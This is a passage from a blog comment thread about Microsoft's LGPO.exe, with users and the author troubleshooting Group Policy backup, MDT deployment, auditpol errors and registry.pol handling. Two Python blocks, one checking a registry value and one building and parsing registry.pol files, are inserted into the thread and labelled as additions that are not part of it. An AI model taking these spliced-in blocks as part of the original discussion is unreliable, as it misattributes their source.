      The registry.pol is maintained via secpol.msc and local security policies or group policies only, policies defined there will periodically be (re)written to the registry
      If you don’t use secpol.msc or GPO you can modify the registry on demand.

  28. This is… EXACTLY what I was looking for a long time now.
    It’s a good thing that you replaced that messed up LocalGPO with all those scripts and unnecessary additions, with this neat and straight forward tool that does it all.
    Thanks in advance. I really appreciate it!

  29. JW says:

    I currently use LocalGPO.wsf to create GPOPacks for use in MDT 2013. Having just found out that LocalGPO.wsf is deprecated and this tool is its replacement, can you explain how to create a GPOPack for use with MDT please.

    [Aaron Margosis] See the /b and /g command line options for capturing a backup of local policy and for applying a saved GPO backup to a system.

  30. Jeff Lawrence says:

    Can this handle policies with group policy registry preferences? I don’t see any syntax to apply a registry.xml as created by a preference.

    [Aaron Margosis] No, LGPO.exe doesn’t currently handle Group Policy Preferences.

  31. Joshua S says:

    Truly appreciate all the hard work on this!

    Ignore the trolls, and I vote to delete ALL posts by that dude.

    Lastly, PLEASE add support for MLGPO. I use it every week.

  32. Hi Aaron,

    I have seen that LGPO adjusts settings of my hardening template when configuring user rights.

    Is there a way to force the application of settings ?

    And, have you a list of settings which can be adjusted by LGPO ? Only user rights or are there other settings?

    Thanks

    Regards
    Greg

    [Aaron Margosis] Were you able to find the documentation? It can manage security template settings, advanced audit settings, administrative template (ADMX) settings, and anything else that lands in registry.pol.
  33. James says:

    Anyone manage to get this to apply an export successfully during an MDT task sequence? I’m trying to apply an export to Windows 10 RS1 via MDT 2013 Update 2. Create an application with source files, working directory is the application directory, with an installation batch file that just calls .\LGPO.exe /g .\. Always works when I run it manually, but when I run it from MDT I always get errors like this:
    Z:\Applications\LGPO>LGPO.exe /g .\
    LGPO.exe v1.00 – Local Group Policy Object utility

    Audit policy directory exists
    Copied .\{7CAC6114-22D3-4914-A3D6-8B9AB789C7D7}\DomainSysvol\GPO\Machine\microsoft\windows nt\Audit\audit.csv
    to C:\windows\system32\GroupPolicy\Machine\Microsoft\Windows NT\Audit\audit.csv
    Clearing existing audit policy
    Apply Audit policy from .\{7CAC6114-22D3-4914-A3D6-8B9AB789C7D7}\DomainSysvol\GPO\Machine\microsoft\windows nt\Audit\audit.csv
    Apply security template: .\{7CAC6114-22D3-4914-A3D6-8B9AB789C7D7}\DomainSysvol\GPO\Machine\microsoft\windows nt\SecEdit\GptTmpl.inf
    Configuring the current system with this template in the /overwrite mode will result in losing the existing security records in the database specified.Do you want to continue this operation ? [y/n]
    The system cannot find the file specified.

    The task has completed with an error.
    See log C:\Users\ADMINI~1\AppData\Local\Temp\GPT3E9D.tmp for detail info.

    [[[ Security template log file output follows: C:\Users\ADMINI~1\AppData\Local\Temp\GPT3E9D.tmp ]]]
    ——————————————-

    Wednesday, August 10, 2016 8:53:00 AM

    Warning 2: The system cannot find the file specified.

    Error opening Z:\Applications\LGPO\{7CAC6114-22D3-4914-A3D6-8B9AB789C7D7}\DomainSysvol\GPO\Machine\microsoft\windows nt\SecEdit\GptTmpl.inf.

    Warning 6: The handle is invalid.

    —-Configuration engine was initialized with one or more errors.—-

    Any ideas?

    1. James says:

      I’m sure there are other ways, but my solution to get this working in MDT was to create an application with the exported GPO as the source files and include an installation batch file with it. The Quiet Install command for the application is install.cmd and the working directory is the application directory. The batch file copies the content locally, executes LGPO from there, and then cleans up. For some reason this worked, but it always errored when running from the Application Directory.

      Batch file code:

      REM Create temp dir for source files
      md %temp%\LGPO_Inst

      REM copy files to local temp dir for execution
      xcopy *.* %temp%\LGPO_Inst /E /H /C /I /Q /Y

      REM switch to local temp dir for execution
      cd /d %temp%\LGPO_Inst

      REM Apply Local GPO
      LGPO.exe /g .\

      cd ..

      REM Cleanup
      rd %temp%\LGPO_Inst /s /q

    2. Thomas says:

      I have the same problem using the LGPO tool. I always get “Configuring the current system with this template in the /overwrite mode will result in losing the existing security records in the database specified.Do you want to continue this operation ? [y/n]”. What is the correct solution? I don’t use MDT.

  34. TonyD says:

    Is there a way to enable the MSS hidden entries with this tool? The option for LocalGPO was /ConfigSCE. My GPO backup has some of these entries set but they do not show on my Windows 10 testing. Thanks.

    [Aaron Margosis] We moved the ancient “MSS” settings from Security Options to a custom Administrative Template. The mechanism that had been used to expose the MSS settings in Security Options had become unsupportable. The new custom ADMX and ADML establish the same registry settings, if you choose to configure them, but in a manner that is supportable. That custom template is included with the newer baselines, such as this one. Install those files in the appropriate locations and then find the settings in your Group Policy editor in Computer Configuration | Administrative Templates | MSS (Legacy).
  35. bitsmed says:

    I know I’m late, but regarding MLGPO, I found this folder to be very interesting: %WinDir%\System32\GroupPolicyUsers
    Here we have sid folders for user(s) who have their own gpo.
    To get sid: wmic useraccount get name,sid

  36. Rodney says:

    Aaron,

    Thank you for creating this tool. I am using it to create hardened baseline security configurations on standalone systems and I am exporting those security baselines to other standalone workstations. I have run into an issue, though: when I export the LGPO policy, the GptTmpl “inf” file [file security] SACLs are missing. I have to turn on auditing on several files and folders and I can’t seem to export the INF file template with the [File Security] settings.

    The LGPO “backup” feature depends on “secedit.exe /export” for the security template content, and “secedit.exe /export” doesn’t include file security settings. GptTmpl.inf is a text file, so I would suggest either copying your original GptTmpl.inf into the backup, or hand-editing the resulting GptTmpl.inf file to add in the file security content.
  37. Pete says:

    Am I missing something, or does this exe write to stderr instead of stdout?
    Entering the following in a cmd window:
    LGPO.exe 1>out.txt 2>err.txt
    writes all the output to err.txt instead of out.txt.
    This is the same for other calls to to LGPO.exe, e.g. using /g

    [Aaron Margosis] It writes banner text, diagnostic and progress information, and usage help text to stderr. It writes output including verbose logs (/v) and “LGPO text” (/parse) to stdout.
    [Aaron Margosis] BTW, have you tried the LGPO.exe v2.0 pre-release? Let us know whether it’s ready or still needs work.
  38. sefi says:

    Hi, can this tool help me import/export group policy that I took from Active Directory to local group policy in Windows 7/10??

    [Aaron Margosis] Absolutely!
  39. RobertEarl says:

    I am having trouble using LGPO v1.00 to backup the policies on a Windows 10 machine. I get error 0x0000000D occurred:

    c:\program files\lgpo\lgpo.exe /b c:\GpoBackups

    LGPO.exe v1.00 – Local Group Policy Object utility

    Creating LGPO backup in “c:\gpobackups\{…..}”

    Executing command:
    c:\windows\system32\auditpol.exe /backup
    /file:”c:gpobackups\{…..]\domainSysvol\GPO\Machine\microsoft\windows nt\audit\audit.csv”

    Error 0x0000000D occurred:
    The data is invalid.

    External process exited with exit code 13
    _________________________________________________________________________________________________

    Any thoughts for me to try to get this to work????

    [Aaron Margosis] Is this on a US-English system or with a different language? Also, can you try with the pre-release LGPO v2 and see whether it still fails?
    1. RobertEarl says:

      It is on an English system and I have tried with Version 2 and get the same error. This is on a Windows 7 system that was upgraded to Windows 10 in place.

      [Aaron Margosis] There was a bug in Windows 10 v1507 and v1511 (that I believe is fixed in v1607) in which the fullprivilegeauditing registry value in HKLM\System\CurrentControlSet\Control\Lsa was set to 0x80 instead of to 0x00 or 0x01, which caused both Auditpol.exe /get and Auditpol.exe /backup to report the same error you mentioned. LGPO.exe has code that works around that error. Perhaps there’s another registry value with a similar problem on your system. Can you post the results of this command in your next comment? Thanks.

      reg.exe query hklm\system\currentcontrolset\control\lsa

      1. RobertEarl says:

        Here you go sir.

        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa

        auditbasedirectories reg_dword 0x0
        auditbaseobjects reg_dword 0x0
        bounds reg_binary 0030000000200000
        limitblankpassworduse reg_sword 0x1
        nolmhash reg_dwors 0x1
        notification packages reg_multi_sz scecli
        authentication packages reg_multi_sz msv1_0
        crashonauditfail reg_dword 0x0
        disabledomaincreds reg_dword 0x0
        everyoneincludesanonymous reg_dword 0x0
        forceguest reg_dword 0x0
        fullprivilegeauditing reg_binary 3000
        lmcompatibilitylevel reg_dword 0x1
        lsapid reg_dword 0x29c
        producttype reg_dword 0x4
        restrictanonymous reg_dword 0x1
        restrictanonymoussam reg_dword 0x1
        scenoapplylegacyauditpolicy reg_dword 0x1
        secureboot reg_dword 0x1
        security packages reg_multi_sz kerberous\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\accessproviders
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\audit
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\centralizedaccesspolicies
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\credssp
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\data
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\fipsalgorithmpolicy
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\gbg
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\jd
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\kerberos
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\msv1_0
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\osconfig
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\skew1
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\sso
        HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa\sspicache

        1. RobertEarl says:

          It appears to be fullprivilegeauditing. If I set that to 00 instead of 3000, LGPO completes the backup without error.

          [Aaron Margosis] Wow. I never saw an instance where that REG_BINARY value was more than one byte, and LGPO.exe corrects only for a misconfigured single byte. Have you seen this on other systems or just this one?
          1. RobertEarl says:

            It seems to be that way on all of our workstations. What is it for? Is it something that has been improperly set in a group policy?

            [Aaron Margosis] From everything I can tell, it should be just one byte — not two or more — and the value should be 0x00 or 0x01. I’ve seen it get set to 0x80 in v1507 and v1511, which causes Auditpol.exe to fail. I haven’t seen it set to anything else, nor heard of that happening. Perhaps the best approach is to use auditpol.exe /set one time across all machines to set it to a correct value.
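As an added defender-side check, not part of LGPO.exe or of this thread, the Python below classifies the fullprivilegeauditing value from the text of `reg.exe query hklm\system\currentcontrolset\control\lsa` using the rule stated in the reply above: exactly one byte, holding 0x00 or 0x01. The embedded sample output is constructed to mirror the listing posted earlier; the function name is my own.

```python
import re

# Constructed sample in reg.exe query layout (real output separates the name, type and
# data columns with runs of spaces). The values mirror the listing posted in this thread.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
    auditbaseobjects    REG_DWORD    0x0
    fullprivilegeauditing    REG_BINARY    3000
    lmcompatibilitylevel    REG_DWORD    0x1
    nolmhash    REG_DWORD    0x1
"""


def check_full_privilege_auditing(reg_query_output):
    """Classify fullprivilegeauditing from `reg.exe query ...\control\lsa` output.

    Returns 'missing', 'ok', 'bad-single-byte' or 'wrong-length'.
    """
    for line in reg_query_output.splitlines():
        cols = re.split(r"\s{2,}", line.strip())          # name / type / data
        if len(cols) != 3 or cols[0].lower() != "fullprivilegeauditing":
            continue
        if cols[1].upper() != "REG_BINARY":
            return "wrong-length"                           # not even the expected type
        data = bytes.fromhex(cols[2])
        if len(data) != 1:
            return "wrong-length"          # e.g. 30 00 as in this thread; LGPO.exe only corrects one byte
        return "ok" if data[0] in (0, 1) else "bad-single-byte"   # 0x80 was the v1507/v1511 symptom
    return "missing"
```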
  40. Mark S says:

    Aaron,

    Just a suggestion, but with the pre-release of 2.0 maybe put a link to that in the header summary for easy finding? Especially if you want to start deprecating the 1.0 version.

    Cheers,
    Mark

    [Aaron Margosis] I like the idea, but URLs change all the time.
  41. alej says:

    Hi, great work. When I import GPO policies to a new computer (with LGPO.exe /g path), the GPOs apply correctly (and appear in gpedit.msc), but in regedit I can not find the key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects

    Where is the new GPO security template imported into regedit? thanks

    [Aaron Margosis] As far as I know, that key is populated only when a Group Policy editor is open, and contains the data that eventually lands in registry.pol files.
  42. Michael Waterman says:

    Hi Aaron,

    Would the lgpo tool be able to process local GPO preferences with the /e option? I’ve created a gpo with a preference that sets a reg key, but I can’t get it to work. Could be me. Hope you can help me out in understanding.

    [Aaron Margosis] LGPO.exe doesn’t support GPP at this time. That looks like it’s going to be a major development effort.
  43. Nick N says:

    It would be great if there was a backup option that went straight to an LGPO text file. My use case is just backing up registry-based LGPO stuff, and I want a nice diffable format. Right now I have to backup to a folder and then parse the .pol files and merge to get a single LGPO text. The LGPO text can be imported, so it would be great to be able to output it as well.

  44. I may have encountered an obscure bug.

    I had instances where `lgpo.exe /t path\lgpo.txt` appeared to not import machine-level settings on a few hosts, and eventually found it was updating \windows\syswow64\grouppolicy\machine\registry.pol rather than \windows\system32\grouppolicy\machine\registry.pol.

    I don’t know how the syswow64 version of registry.pol was created (on only a few machines in my environment), but I’ve found it to be reproducible that if I copy system32\GroupPolicy to syswow64\GroupPolicy, that subsequent runs of lgpo.exe will begin updating the syswow64 version rather than the system32 version of registry.pol.

    I will attempt to work around it by finding and removing syswow64\GroupPolicy\Machine and syswow64\GroupPolicy\User. Are there any cases where a syswow64 copy of the GroupPolicy folder should be kept rather than removed?

    Thanks again Aaron for the great tool, it continues to be useful for me daily!

    1. Another quick test – if the Windows\SysWOW64\GroupPolicy\Machine folder is present, lgpo.exe /t file.inf will create a new registry.pol file in the syswow64 path. So I don’t need an existing registry.pol file, just the existence of a SysWOW64\GroupPolicy\Machine folder is enough to trigger this issue for me.

      [Aaron Margosis] LGPO.exe is an x86 executable, so it could be redirected from System32 to SysWOW64 – it will certainly load DLLs from SysWOW64 rather than System32. But it uses documented Windows interfaces and doesn’t look for the System32\GroupPolicy folder explicitly, so my guess is that this is a Windows anomaly rather than anything specific to LGPO.exe. Are there any “normal” situations in which a SysWOW64\GroupPolicy directory might get created?
  45. Christoph Hacker says:

    Hi!
    Thanks for the great work!
    But…
    How do I export MLGPOs on a Win10Enterprise Machine and how do I import them, or create a GPOPack (which are the compatible files, which need to be included in the export directory… GPOPack.wsf/LocalPol.exe/LocalSecurityDB.sdb?)?
    I would highly appreciate an answer to solve this week-long problem. 🙂

    [Aaron Margosis] Backup of MLGPO is going to be somewhat manual. E.g., copy out the registry.pol someplace, or convert it to “LGPO text” using LGPO.exe /parse /ua or /un. Apply it to a new system in the reverse manner: LGPO.exe /t lgpo-text-file, or LGPO.exe /ua path-to-registry.pol. FWIW, I don’t think LocalGPO.wsf handled backup/restore of MLGPO either.

    Oh, and you need LGPO v2 for this. https://blogs.technet.microsoft.com/secguide/2016/09/23/lgpo-exe-v2-0-pre-release-support-for-mlgpo-and-reg_qword/

  46. Patrick Nuckle says:

    Hi, I’m trying to disable Windows 10’s Cortana using the text policy file below.

    Computer
    SOFTWARE\Policies\Microsoft\Windows\Windows Search
    AllowCortana
    DWORD:0

    The command that I’m using is lgpo.exe /t cortana.txt /v

    The Result is this:
    Apply registry-based settings from LGPO text file: cortana.txt
    PROCESSING INPUT FILE FOR REGISTRY-BASED POLICY: cortana.txt

    Computer Config SOFTWARE\Policies\Microsoft\Windows\Windows Search AllowCortana REG_DWORD 0

    The problem is that the policy never seems to actually get applied if I check the registry or using gpedit.
    Am I missing something?

    Thanks

    [Aaron Margosis] Is there a domain policy overriding the local policy?
    1. Patrick Nuckle says:

      Hi Aaron, I’m just getting back into trying to configure policies again. I looked into Domain policies but I don’t think that’s the case. I’m rolling out Win 10 Enterprise x64 1703 and LGPO policies just don’t take effect. We have 2 domains. I tried our new one, our old one, I tried different OUs, and I tried totally taking the client machine out of the domain, nothing works. The weird thing is that I have another Win 10 machine that’s part of our old domain. That one was setup manually and is build 1607. Any idea what could be going on? The group policy operational log reports error event 7016 when I run the command.

      1. Patrick Nuckle says:

        I didn’t complete my statement above, the machine that was rolled out “manually” does apply my Cortana policy successfully using LGPO.EXE.

  47. Roger says:

    I have installed the Windows-10-RS1 and Server 2016 Baselines which use LGPO for their installation. When I install the Member server, I see the custom templates referenced in the article (e.g. MS Security Guide) when I run Gpedit.msc. When I do the same thing on a W10 1607 LTSB system, I see nothing in GPEdit. The strange part is that the settings are actually there. Specifically the “Apply UAC restrictions to local accounts on network logons” is enabled if I check the registry. Also if I change the registry to zero and then reboot, it is set back to 1. Am I missing something or do Custom Templates just not show in the client GP Editor? If not, how do I change the policies or use the other legacy policies that have been added? Thanks

    [Aaron Margosis] For the client editor bit: are you sure the custom ADMX and ADML were copied into the correct PolicyDefinition directories? For the registry editing: that’s not surprising – when the GPO applies again after reboot, it will overwrite any manual registry edits.
  48. UkiwiS says:

    I’m struggling with this.

    I have 10-12 settings I want to deploy to a machine. Prior to importing I take a backup which has no configured settings. I then import my settings from a folder and I can see that they are present using GPedit. Now, if I want to remove these settings I feel that I should simply be able to restore or import the previous backup, but I’m seeing that if I perform the restore there is no change. I’ve run “gpupdate /target:computer /force” and I’ve even rebooted but the settings remain. What am I missing?

    [Aaron Margosis] Local-GPO backup is of limited use. I added this paragraph to the v2.2 documentation:

    ALSO NOTE: if you apply settings to local policy and then export local policy, the security template and advanced auditing portions of the exported policy will almost certainly be different from the policy you applied. “Auditpol.exe /backup” reports all advanced auditing settings, not just the ones you applied. Similarly, “secedit.exe /export” reports most local security settings whether they were defaults, applied through a security template, or changed through other means. Secedit.exe also has some other quirks. For example, it won’t report user rights assignments that are empty, and reports only a subset of the sections that might appear in a security template. It won’t report file security settings, registry security settings, service settings, or restricted groups. For these reasons, local policy backups might be of limited value.

  49. GhostKU says:

    It looks like I found the thing that I need, but it is too difficult for me.
    I need to disable One Drive, so I need to set
    “Computer Configuration > Administrative Templates > Windows Components > OneDrive>Prevent the usage of OneDrive for file storage” policy to “Enabled”
    How can I do that with LGPO.exe?
    Thanks

    [Aaron Margosis] On a vanilla system with no local policies, apply that one setting using gpedit.msc. Get the registry.pol file from System32\GroupPolicy\Machine. Use that with LGPO.exe, or parse it to LGPO-text using “lgpo.exe /parse /m registry.pol” and use that resulting text.
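The four-line LGPO text block in Patrick Nuckle's comment above and the “lgpo.exe /parse /m registry.pol” workflow in this reply both rest on the registry.pol (PReg) layout. As an added example that is not part of LGPO.exe or of this thread, the Python below builds a minimal version-1 registry.pol from constructed entries, parses it back, and renders the result in LGPO text form; it handles only REG_DWORD and REG_SZ, the sample entries are constructed, and the function names are my own.

```python
import struct

REG_SZ, REG_DWORD = 1, 4                      # registry value types handled here
PREG_HEADER = b"PReg" + struct.pack("<I", 1)  # "PReg" signature followed by format version 1
_SEP, _OPEN, _CLOSE = (c.encode("utf-16-le") for c in ";[]")

def _u16(s):
    """Null-terminated UTF-16LE, as registry.pol stores key paths, value names and REG_SZ data."""
    return (s + "\0").encode("utf-16-le")

def build_registry_pol(entries):
    """Build a registry.pol blob from (key, value_name, type, data) tuples (int for DWORD, str for SZ)."""
    out = bytearray(PREG_HEADER)
    for key, value, rtype, data in entries:
        if rtype == REG_DWORD:
            raw = struct.pack("<I", data)
        elif rtype == REG_SZ:
            raw = _u16(data)
        else:
            raise ValueError(f"unsupported type {rtype}")
        # One record is [key;value;type;size;data]; the delimiters are stored as UTF-16LE characters.
        out += (_OPEN + _u16(key) + _SEP + _u16(value) + _SEP + struct.pack("<I", rtype)
                + _SEP + struct.pack("<I", len(raw)) + _SEP + raw + _CLOSE)
    return bytes(out)

def parse_registry_pol(blob):
    """Decode a registry.pol blob back into (key, value_name, type, data) tuples."""
    if blob[:8] != PREG_HEADER:
        raise ValueError("not a version-1 PReg file")

    def read_str(p):                # scan on 2-byte boundaries: an unaligned 00 00 is not a terminator
        q = p
        while blob[q:q + 2] != b"\0\0":
            q += 2
            if q >= len(blob):
                raise ValueError("unterminated string")
        return blob[p:q].decode("utf-16-le"), q + 2

    def expect(p, token):           # consume one delimiter character or fail loudly
        if blob[p:p + 2] != token:
            raise ValueError(f"malformed record at offset {p}")
        return p + 2

    pos, entries = 8, []
    while pos < len(blob):
        key, pos = read_str(expect(pos, _OPEN))
        value, pos = read_str(expect(pos, _SEP))
        pos = expect(pos, _SEP)
        rtype, pos = struct.unpack_from("<I", blob, pos)[0], expect(pos + 4, _SEP)
        size, pos = struct.unpack_from("<I", blob, pos)[0], expect(pos + 4, _SEP)
        raw, pos = blob[pos:pos + size], expect(pos + size, _CLOSE)
        data = (struct.unpack("<I", raw)[0] if rtype == REG_DWORD else
                raw.decode("utf-16-le").rstrip("\0") if rtype == REG_SZ else raw)  # others stay raw
        entries.append((key, value, rtype, data))
    return entries

def to_lgpo_text(entries, scope="Computer"):
    """Render entries as LGPO text: scope, key path, value name, TYPE:data, one blank line between."""
    names = {REG_DWORD: "DWORD", REG_SZ: "SZ"}
    return "\n\n".join(f"{scope}\n{k}\n{v}\n{names[t]}:{d}" for k, v, t, d in entries) + "\n"

# Constructed sample: the AllowCortana setting from the comment above plus one REG_SZ value.
SAMPLE_ENTRIES = [
    (r"SOFTWARE\Policies\Microsoft\Windows\Windows Search", "AllowCortana", REG_DWORD, 0),
    (r"SOFTWARE\Policies\Example", "Banner", REG_SZ, "hello"),
]
```

`print(to_lgpo_text(parse_registry_pol(build_registry_pol(SAMPLE_ENTRIES))))` reproduces the block from the comment above for the first entry.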
  50. Achim says:

    Where can I download the version 2 of the LGPO tool supporting Windows Server 2016? I can’t find a download link.
